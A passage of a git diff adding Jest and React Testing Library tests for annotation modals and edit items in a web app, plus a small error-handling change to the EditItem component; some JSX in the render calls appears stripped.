, +})) + +const mockNotify = Toast.notify as jest.Mock +const useProviderContextMock = useProviderContext as jest.Mock +const annotationBatchImportMock = annotationBatchImport as jest.Mock +const checkAnnotationBatchImportProgressMock = checkAnnotationBatchImportProgress as jest.Mock + +const renderComponent = (props: Partial = {}) => { + const mergedProps: IBatchModalProps = { + appId: 'app-id', + isShow: true, + onCancel: jest.fn(), + onAdded: jest.fn(), + ...props, + } + return { + ...render(), + props: mergedProps, + } +} + +describe('BatchModal', () => { + beforeEach(() => { + jest.clearAllMocks() + lastUploadedFile = undefined + useProviderContextMock.mockReturnValue({ + plan: { + usage: { annotatedResponse: 0 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: false, + }) + }) + + it('should disable run action and show billing hint when annotation quota is full', () => { + useProviderContextMock.mockReturnValue({ + plan: { + usage: { annotatedResponse: 10 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: true, + }) + + renderComponent() + + expect(screen.getByTestId('annotation-full')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'appAnnotation.batchModal.run' })).toBeDisabled() + }) + + it('should reset uploader state when modal closes and allow manual cancellation', () => { + const { rerender, props } = renderComponent() + + fireEvent.click(screen.getByTestId('mock-uploader')) + expect(screen.getByTestId('selected-file')).toHaveTextContent('batch.csv') + + rerender() + rerender() + + expect(screen.queryByTestId('selected-file')).toBeNull() + + fireEvent.click(screen.getByRole('button', { name: 'appAnnotation.batchModal.cancel' })) + expect(props.onCancel).toHaveBeenCalledTimes(1) + }) + + it('should submit the csv file, poll status, and notify when import completes', async () => { + jest.useFakeTimers() + const { props } = renderComponent() + const fileTrigger = screen.getByTestId('mock-uploader') + fireEvent.click(fileTrigger) + + const runButton = screen.getByRole('button', { name: 'appAnnotation.batchModal.run' }) + expect(runButton).not.toBeDisabled() + + annotationBatchImportMock.mockResolvedValue({ job_id: 'job-1', job_status: ProcessStatus.PROCESSING }) + checkAnnotationBatchImportProgressMock + .mockResolvedValueOnce({ job_id: 'job-1', job_status: ProcessStatus.PROCESSING }) + .mockResolvedValueOnce({ job_id: 'job-1', job_status: ProcessStatus.COMPLETED }) + + await act(async () => { + fireEvent.click(runButton) + }) + + await waitFor(() => { + expect(annotationBatchImportMock).toHaveBeenCalledTimes(1) + }) + + const formData = annotationBatchImportMock.mock.calls[0][0].body as FormData + expect(formData.get('file')).toBe(lastUploadedFile) + + await waitFor(() => { + expect(checkAnnotationBatchImportProgressMock).toHaveBeenCalledTimes(1) + }) + + await act(async () => { + jest.runOnlyPendingTimers() + }) + + await waitFor(() => { + expect(checkAnnotationBatchImportProgressMock).toHaveBeenCalledTimes(2) + }) + + await waitFor(() => { + expect(mockNotify).toHaveBeenCalledWith({ + type: 'success', + message: 'appAnnotation.batchModal.completed', + }) + expect(props.onAdded).toHaveBeenCalledTimes(1) + expect(props.onCancel).toHaveBeenCalledTimes(1) + }) + jest.useRealTimers() + }) +}) diff --git a/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx b/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx new file mode 100644 index 0000000000..fd6d900aa4 --- /dev/null +++ b/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx @@ -0,0 +1,98 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import ClearAllAnnotationsConfirmModal from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'appAnnotation.table.header.clearAllConfirm': 'Clear all annotations?', + 'common.operation.confirm': 'Confirm', + 'common.operation.cancel': 'Cancel', + } + return translations[key] || key + }, + }), +})) + +beforeEach(() => { + jest.clearAllMocks() +}) + +describe('ClearAllAnnotationsConfirmModal', () => { + // Rendering visibility toggled by isShow flag + describe('Rendering', () => { + test('should show confirmation dialog when isShow is true', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.getByText('Clear all annotations?')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Cancel' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Confirm' })).toBeInTheDocument() + }) + + test('should not render anything when isShow is false', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.queryByText('Clear all annotations?')).not.toBeInTheDocument() + }) + }) + + // User confirms or cancels clearing annotations + describe('Interactions', () => { + test('should trigger onHide when cancel is clicked', () => { + const onHide = jest.fn() + const onConfirm = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Cancel' })) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + expect(onConfirm).not.toHaveBeenCalled() + }) + + test('should trigger onConfirm when confirm is clicked', () => { + const onHide = jest.fn() + const onConfirm = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Confirm' })) + + // Assert + expect(onConfirm).toHaveBeenCalledTimes(1) + expect(onHide).not.toHaveBeenCalled() + }) + }) +}) diff --git a/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx new file mode 100644 index 0000000000..95a5586292 --- /dev/null +++ b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.spec.tsx @@ -0,0 +1,466 @@ +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import EditItem, { EditItemType, EditTitle } from './index' + +describe('EditTitle', () => { + it('should render title content correctly', () => { + // Arrange + const props = { title: 'Test Title' } + + // Act + render() + + // Assert + expect(screen.getByText(/test title/i)).toBeInTheDocument() + // Should contain edit icon (svg element) + expect(document.querySelector('svg')).toBeInTheDocument() + }) + + it('should apply custom className when provided', () => { + // Arrange + const props = { + title: 'Test Title', + className: 'custom-class', + } + + // Act + const { container } = render() + + // Assert + expect(screen.getByText(/test title/i)).toBeInTheDocument() + expect(container.querySelector('.custom-class')).toBeInTheDocument() + }) +}) + +describe('EditItem', () => { + const defaultProps = { + type: EditItemType.Query, + content: 'Test content', + onSave: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render content correctly', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + expect(screen.getByText(/test content/i)).toBeInTheDocument() + // Should show item name (query or answer) + expect(screen.getByText('appAnnotation.editModal.queryName')).toBeInTheDocument() + }) + + it('should render different item types correctly', () => { + // Arrange + const props = { + ...defaultProps, + type: EditItemType.Answer, + content: 'Answer content', + } + + // Act + render() + + // Assert + expect(screen.getByText(/answer content/i)).toBeInTheDocument() + expect(screen.getByText('appAnnotation.editModal.answerName')).toBeInTheDocument() + }) + + it('should show edit controls when not readonly', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + }) + + it('should hide edit controls when readonly', () => { + // Arrange + const props = { + ...defaultProps, + readonly: true, + } + + // Act + render() + + // Assert + expect(screen.queryByText('common.operation.edit')).not.toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should respect readonly prop for edit functionality', () => { + // Arrange + const props = { + ...defaultProps, + readonly: true, + } + + // Act + render() + + // Assert + expect(screen.getByText(/test content/i)).toBeInTheDocument() + expect(screen.queryByText('common.operation.edit')).not.toBeInTheDocument() + }) + + it('should display provided content', () => { + // Arrange + const props = { + ...defaultProps, + content: 'Custom content for testing', + } + + // Act + render() + + // Assert + expect(screen.getByText(/custom content for testing/i)).toBeInTheDocument() + }) + + it('should render appropriate content based on type', () => { + // Arrange + const props = { + ...defaultProps, + type: EditItemType.Query, + content: 'Question content', + } + + // Act + render() + + // Assert + expect(screen.getByText(/question content/i)).toBeInTheDocument() + expect(screen.getByText('appAnnotation.editModal.queryName')).toBeInTheDocument() + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should activate edit mode when edit button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + // Assert + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.cancel' })).toBeInTheDocument() + }) + + it('should save new content when save button is clicked', async () => { + // Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + // Type new content + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Updated content') + + // Save + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert + expect(mockSave).toHaveBeenCalledWith('Updated content') + }) + + it('should exit edit mode when cancel button is clicked', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + await user.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + + // Assert + expect(screen.queryByRole('textbox')).not.toBeInTheDocument() + expect(screen.getByText(/test content/i)).toBeInTheDocument() + }) + + it('should show content preview while typing', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + await user.type(textarea, 'New content') + + // Assert + expect(screen.getByText(/new content/i)).toBeInTheDocument() + }) + + it('should call onSave with correct content when saving', async () => { + // Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Test save content') + + // Save + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert + expect(mockSave).toHaveBeenCalledWith('Test save content') + }) + + it('should show delete option and restore original content when delete is clicked', async () => { + // Arrange + const mockSave = jest.fn().mockResolvedValue(undefined) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + + // Enter edit mode and change content + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified content') + + // Save to trigger content change + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert + expect(mockSave).toHaveBeenNthCalledWith(1, 'Modified content') + expect(await screen.findByText('common.operation.delete')).toBeInTheDocument() + + await user.click(screen.getByText('common.operation.delete')) + + expect(mockSave).toHaveBeenNthCalledWith(2, 'Test content') + expect(screen.queryByText('common.operation.delete')).not.toBeInTheDocument() + }) + + it('should handle keyboard interactions in edit mode', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('common.operation.edit')) + + const textarea = screen.getByRole('textbox') + + // Test typing + await user.type(textarea, 'Keyboard test') + + // Assert + expect(textarea).toHaveValue('Keyboard test') + expect(screen.getByText(/keyboard test/i)).toBeInTheDocument() + }) + }) + + // State Management + describe('State Management', () => { + it('should reset newContent when content prop changes', async () => { + // Arrange + const { rerender } = render() + + // Act - Enter edit mode and type something + const user = userEvent.setup() + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'New content') + + // Rerender with new content prop + rerender() + + // Assert - Textarea value should be reset due to useEffect + expect(textarea).toHaveValue('') + }) + + it('should preserve edit state across content changes', async () => { + // Arrange + const { rerender } = render() + const user = userEvent.setup() + + // Act - Enter edit mode + await user.click(screen.getByText('common.operation.edit')) + + // Rerender with new content + rerender() + + // Assert - Should still be in edit mode + expect(screen.getByRole('textbox')).toBeInTheDocument() + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle empty content', () => { + // Arrange + const props = { + ...defaultProps, + content: '', + } + + // Act + const { container } = render() + + // Assert - Should render without crashing + // Check that the component renders properly with empty content + expect(container.querySelector('.grow')).toBeInTheDocument() + // Should still show edit button + expect(screen.getByText('common.operation.edit')).toBeInTheDocument() + }) + + it('should handle very long content', () => { + // Arrange + const longContent = 'A'.repeat(1000) + const props = { + ...defaultProps, + content: longContent, + } + + // Act + render() + + // Assert + expect(screen.getByText(longContent)).toBeInTheDocument() + }) + + it('should handle content with special characters', () => { + // Arrange + const specialContent = 'Content with & < > " \' characters' + const props = { + ...defaultProps, + content: specialContent, + } + + // Act + render() + + // Assert + expect(screen.getByText(specialContent)).toBeInTheDocument() + }) + + it('should handle rapid edit/cancel operations', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + + // Rapid edit/cancel operations + await user.click(screen.getByText('common.operation.edit')) + await user.click(screen.getByText('common.operation.cancel')) + await user.click(screen.getByText('common.operation.edit')) + await user.click(screen.getByText('common.operation.cancel')) + + // Assert + expect(screen.queryByRole('textbox')).not.toBeInTheDocument() + expect(screen.getByText('Test content')).toBeInTheDocument() + }) + + it('should handle save failure gracefully in edit mode', async () => { + // Arrange + const mockSave = jest.fn().mockRejectedValueOnce(new Error('Save failed')) + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + + // Enter edit mode and save (should fail) + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.type(textarea, 'New content') + + // Save should fail but not throw + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + + // Assert - Should remain in edit mode when save fails + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + expect(mockSave).toHaveBeenCalledWith('New content') + }) + + it('should handle delete action failure gracefully', async () => { + // Arrange + const mockSave = jest.fn() + .mockResolvedValueOnce(undefined) // First save succeeds + .mockRejectedValueOnce(new Error('Delete failed')) // Delete fails + const props = { + ...defaultProps, + onSave: mockSave, + } + const user = userEvent.setup() + + // Act + render() + + // Edit content to show delete button + await user.click(screen.getByText('common.operation.edit')) + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified content') + + // Save to create new content + await user.click(screen.getByRole('button', { name: 'common.operation.save' })) + await screen.findByText('common.operation.delete') + + // Click delete (should fail but not throw) + await user.click(screen.getByText('common.operation.delete')) + + // Assert - Delete action should handle error gracefully + expect(mockSave).toHaveBeenCalledTimes(2) + expect(mockSave).toHaveBeenNthCalledWith(1, 'Modified content') + expect(mockSave).toHaveBeenNthCalledWith(2, 'Test content') + + // When delete fails, the delete button should still be visible (state not changed) + expect(screen.getByText('common.operation.delete')).toBeInTheDocument() + expect(screen.getByText('Modified content')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.tsx b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.tsx index e808d0b48a..6ba830967d 100644 --- a/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.tsx +++ b/web/app/components/app/annotation/edit-annotation-modal/edit-item/index.tsx @@ -6,7 +6,7 @@ import { RiDeleteBinLine, RiEditFill, RiEditLine } from '@remixicon/react' import { Robot, User } from '@/app/components/base/icons/src/public/avatar' import Textarea from '@/app/components/base/textarea' import Button from '@/app/components/base/button' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' export enum EditItemType { Query = 'query', @@ -52,8 +52,14 @@ const EditItem: FC = ({ }, [content]) const handleSave = async () => { - await onSave(newContent) - setIsEdit(false) + try { + await onSave(newContent) + setIsEdit(false) + } + catch { + // Keep edit mode open when save fails + // Error notification is handled by the parent component + } } const handleCancel = () => { @@ -96,9 +102,16 @@ const EditItem: FC = ({
·
{ - setNewContent(content) - onSave(content) + onClick={async () => { + try { + await onSave(content) + // Only update UI state after successful delete + setNewContent(content) + } + catch { + // Delete action failed - error is already handled by parent + // UI state remains unchanged, user can retry + } }} >
diff --git a/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..bdc991116c --- /dev/null +++ b/web/app/components/app/annotation/edit-annotation-modal/index.spec.tsx @@ -0,0 +1,680 @@ +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import Toast, { type IToastProps, type ToastHandle } from '@/app/components/base/toast' +import EditAnnotationModal from './index' + +// Mock only external dependencies +jest.mock('@/service/annotation', () => ({ + addAnnotation: jest.fn(), + editAnnotation: jest.fn(), +})) + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + plan: { + usage: { annotatedResponse: 5 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: true, + }), +})) + +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: () => '2023-12-01 10:30:00', + }), +})) + +// Note: i18n is automatically mocked by Jest via __mocks__/react-i18next.ts + +jest.mock('@/app/components/billing/annotation-full', () => ({ + __esModule: true, + default: () =>
, +})) + +type ToastNotifyProps = Pick +type ToastWithNotify = typeof Toast & { notify: (props: ToastNotifyProps) => ToastHandle } +const toastWithNotify = Toast as unknown as ToastWithNotify +const toastNotifySpy = jest.spyOn(toastWithNotify, 'notify').mockReturnValue({ clear: jest.fn() }) + +const { addAnnotation: mockAddAnnotation, editAnnotation: mockEditAnnotation } = jest.requireMock('@/service/annotation') as { + addAnnotation: jest.Mock + editAnnotation: jest.Mock +} + +describe('EditAnnotationModal', () => { + const defaultProps = { + isShow: true, + onHide: jest.fn(), + appId: 'test-app-id', + query: 'Test query', + answer: 'Test answer', + onEdited: jest.fn(), + onAdded: jest.fn(), + onRemove: jest.fn(), + } + + afterAll(() => { + toastNotifySpy.mockRestore() + }) + + beforeEach(() => { + jest.clearAllMocks() + mockAddAnnotation.mockResolvedValue({ + id: 'test-id', + account: { name: 'Test User' }, + }) + mockEditAnnotation.mockResolvedValue({}) + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render modal when isShow is true', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Check for modal title as it appears in the mock + expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument() + }) + + it('should not render modal when isShow is false', () => { + // Arrange + const props = { ...defaultProps, isShow: false } + + // Act + render() + + // Assert + expect(screen.queryByText('appAnnotation.editModal.title')).not.toBeInTheDocument() + }) + + it('should display query and answer sections', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Look for query and answer content + expect(screen.getByText('Test query')).toBeInTheDocument() + expect(screen.getByText('Test answer')).toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should handle different query and answer content', () => { + // Arrange + const props = { + ...defaultProps, + query: 'Custom query content', + answer: 'Custom answer content', + } + + // Act + render() + + // Assert - Check content is displayed + expect(screen.getByText('Custom query content')).toBeInTheDocument() + expect(screen.getByText('Custom answer content')).toBeInTheDocument() + }) + + it('should show remove option when annotationId is provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + + // Act + render() + + // Assert - Remove option should be present (using pattern) + expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument() + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should enable editing for query and answer sections', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Edit links should be visible (using text content) + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + expect(editLinks).toHaveLength(2) + }) + + it('should show remove option when annotationId is provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + + // Act + render() + + // Assert + expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument() + }) + + it('should save content when edited', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = userEvent.setup() + + // Mock API response + mockAddAnnotation.mockResolvedValueOnce({ + id: 'test-annotation-id', + account: { name: 'Test User' }, + }) + + // Act + render() + + // Find and click edit link for query + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + // Find textarea and enter new content + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'New query content') + + // Click save button + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + expect(mockAddAnnotation).toHaveBeenCalledWith('test-app-id', { + question: 'New query content', + answer: 'Test answer', + message_id: undefined, + }) + }) + }) + + // API Calls + describe('API Calls', () => { + it('should call addAnnotation when saving new annotation', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = userEvent.setup() + + // Mock the API response + mockAddAnnotation.mockResolvedValueOnce({ + id: 'test-annotation-id', + account: { name: 'Test User' }, + }) + + // Act + render() + + // Edit query content + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Updated query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + expect(mockAddAnnotation).toHaveBeenCalledWith('test-app-id', { + question: 'Updated query', + answer: 'Test answer', + message_id: undefined, + }) + }) + + it('should call editAnnotation when updating existing annotation', async () => { + // Arrange + const mockOnEdited = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + messageId: 'test-message-id', + onEdited: mockOnEdited, + } + const user = userEvent.setup() + + // Act + render() + + // Edit query content + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + expect(mockEditAnnotation).toHaveBeenCalledWith( + 'test-app-id', + 'test-annotation-id', + { + message_id: 'test-message-id', + question: 'Modified query', + answer: 'Test answer', + }, + ) + }) + }) + + // State Management + describe('State Management', () => { + it('should initialize with closed confirm modal', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Confirm dialog should not be visible initially + expect(screen.queryByText('appDebug.feature.annotation.removeConfirm')).not.toBeInTheDocument() + }) + + it('should show confirm modal when remove is clicked', async () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('appAnnotation.editModal.removeThisCache')) + + // Assert - Confirmation dialog should appear + expect(screen.getByText('appDebug.feature.annotation.removeConfirm')).toBeInTheDocument() + }) + + it('should call onRemove when removal is confirmed', async () => { + // Arrange + const mockOnRemove = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + onRemove: mockOnRemove, + } + const user = userEvent.setup() + + // Act + render() + + // Click remove + await user.click(screen.getByText('appAnnotation.editModal.removeThisCache')) + + // Click confirm + const confirmButton = screen.getByRole('button', { name: 'common.operation.confirm' }) + await user.click(confirmButton) + + // Assert + expect(mockOnRemove).toHaveBeenCalled() + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle empty query and answer', () => { + // Arrange + const props = { + ...defaultProps, + query: '', + answer: '', + } + + // Act + render() + + // Assert + expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument() + }) + + it('should handle very long content', () => { + // Arrange + const longQuery = 'Q'.repeat(1000) + const longAnswer = 'A'.repeat(1000) + const props = { + ...defaultProps, + query: longQuery, + answer: longAnswer, + } + + // Act + render() + + // Assert + expect(screen.getByText(longQuery)).toBeInTheDocument() + expect(screen.getByText(longAnswer)).toBeInTheDocument() + }) + + it('should handle special characters in content', () => { + // Arrange + const specialQuery = 'Query with & < > " \' characters' + const specialAnswer = 'Answer with & < > " \' characters' + const props = { + ...defaultProps, + query: specialQuery, + answer: specialAnswer, + } + + // Act + render() + + // Assert + expect(screen.getByText(specialQuery)).toBeInTheDocument() + expect(screen.getByText(specialAnswer)).toBeInTheDocument() + }) + + it('should handle onlyEditResponse prop', () => { + // Arrange + const props = { + ...defaultProps, + onlyEditResponse: true, + } + + // Act + render() + + // Assert - Query should be readonly, answer should be editable + const editLinks = screen.queryAllByText(/common\.operation\.edit/i) + expect(editLinks).toHaveLength(1) // Only answer should have edit button + }) + }) + + // Error Handling (CRITICAL for coverage) + describe('Error Handling', () => { + it('should show error toast and skip callbacks when addAnnotation fails', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = userEvent.setup() + + // Mock API failure + mockAddAnnotation.mockRejectedValueOnce(new Error('API Error')) + + // Act + render() + + // Find and click edit link for query + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + // Find textarea and enter new content + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'New query content') + + // Click save button + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + await waitFor(() => { + expect(toastNotifySpy).toHaveBeenCalledWith({ + message: 'API Error', + type: 'error', + }) + }) + expect(mockOnAdded).not.toHaveBeenCalled() + + // Verify edit mode remains open (textarea should still be visible) + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + }) + + it('should show fallback error message when addAnnotation error has no message', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = userEvent.setup() + + mockAddAnnotation.mockRejectedValueOnce({}) + + // Act + render() + + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'New query content') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + await waitFor(() => { + expect(toastNotifySpy).toHaveBeenCalledWith({ + message: 'common.api.actionFailed', + type: 'error', + }) + }) + expect(mockOnAdded).not.toHaveBeenCalled() + + // Verify edit mode remains open (textarea should still be visible) + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + }) + + it('should show error toast and skip callbacks when editAnnotation fails', async () => { + // Arrange + const mockOnEdited = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + messageId: 'test-message-id', + onEdited: mockOnEdited, + } + const user = userEvent.setup() + + // Mock API failure + mockEditAnnotation.mockRejectedValueOnce(new Error('API Error')) + + // Act + render() + + // Edit query content + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + await waitFor(() => { + expect(toastNotifySpy).toHaveBeenCalledWith({ + message: 'API Error', + type: 'error', + }) + }) + expect(mockOnEdited).not.toHaveBeenCalled() + + // Verify edit mode remains open (textarea should still be visible) + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + }) + + it('should show fallback error message when editAnnotation error is not an Error instance', async () => { + // Arrange + const mockOnEdited = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + messageId: 'test-message-id', + onEdited: mockOnEdited, + } + const user = userEvent.setup() + + mockEditAnnotation.mockRejectedValueOnce('oops') + + // Act + render() + + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + await waitFor(() => { + expect(toastNotifySpy).toHaveBeenCalledWith({ + message: 'common.api.actionFailed', + type: 'error', + }) + }) + expect(mockOnEdited).not.toHaveBeenCalled() + + // Verify edit mode remains open (textarea should still be visible) + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + }) + }) + + // Billing & Plan Features + describe('Billing & Plan Features', () => { + it('should show createdAt time when provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + createdAt: 1701381000, // 2023-12-01 10:30:00 + } + + // Act + render() + + // Assert - Check that the formatted time appears somewhere in the component + const container = screen.getByRole('dialog') + expect(container).toHaveTextContent('2023-12-01 10:30:00') + }) + + it('should not show createdAt when not provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + // createdAt is undefined + } + + // Act + render() + + // Assert - Should not contain any timestamp + const container = screen.getByRole('dialog') + expect(container).not.toHaveTextContent('2023-12-01 10:30:00') + }) + + it('should display remove section when annotationId exists', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + + // Act + render() + + // Assert - Should have remove functionality + expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument() + }) + }) + + // Toast Notifications (Success) + describe('Toast Notifications', () => { + it('should show success notification when save operation completes', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Updated query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + await waitFor(() => { + expect(toastNotifySpy).toHaveBeenCalledWith({ + message: 'common.api.actionSuccess', + type: 'success', + }) + }) + }) + }) + + // React.memo Performance Testing + describe('React.memo Performance', () => { + it('should not re-render when props are the same', () => { + // Arrange + const props = { ...defaultProps } + const { rerender } = render() + 